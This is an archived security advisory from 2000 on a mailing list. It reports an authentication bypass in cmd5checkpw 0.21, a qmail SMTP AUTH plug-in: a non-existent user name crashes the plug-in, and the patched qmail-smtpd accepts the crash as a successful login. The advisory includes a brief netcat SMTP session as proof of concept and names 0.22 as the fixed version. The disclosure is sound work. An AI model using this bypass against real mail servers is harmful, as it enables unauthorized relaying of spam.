OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Authentication failure in cmd5checkpw 0.21
From: Javier Kohen (jkohenTOUGH.COM)
Date: Mon Oct 16 2000 - 21:18:21 CDT

Program: cmd5checkpw
Vulnerable versions: 0.21 (probably earlier, too.)
Fixed versions: 0.22
URI: http://freshmeat.net/projects/cmd5checkpw/
Author: Elysium deeZine <http://www.elysium.pl/>

Description:
This program works as an authentication plug-in for a patch of the same author to add SMTP AUTH support to QMail. I found that if it was fed with a non-existing user name, it would segfault due to the lack of checking for the (imprabable?) reason of such an invalid input. The exploit here comes from the consecuence of this problem; the caller -in this case the patched qmail-smtpd - would take its child crashing as a successful authentication, thus validating the session. This brings an open door for spam.
Even though this utility was fixed, the vulnerability in the patch to qmail-smtpd still remains, leaving the door opened to further bugs in the authentication plug-ins.

Proof of concept:
$ nc localhost smtp
< 220 ns.foo.com.ar ESMTP
> ehlo spammer.net
< 250-ns.foo.com.ar
< 250-AUTH=LOGIN CRAM-MD5 PLAIN
< 250-AUTH LOGIN CRAM-MD5 PLAIN
< 250-PIPELINING
< 250 8BITMIME
> auth plain
< 334 ok. go on.
> xyzzy<NUL>nopasswordneeded<NUL>
< ??? ok. 

-- 
Javier Kohen <jkohentough.com>
ICQ #2361802 [blashyrkh]
http://www.tough.com.ar/
  • application/pgp-signature attachment: stored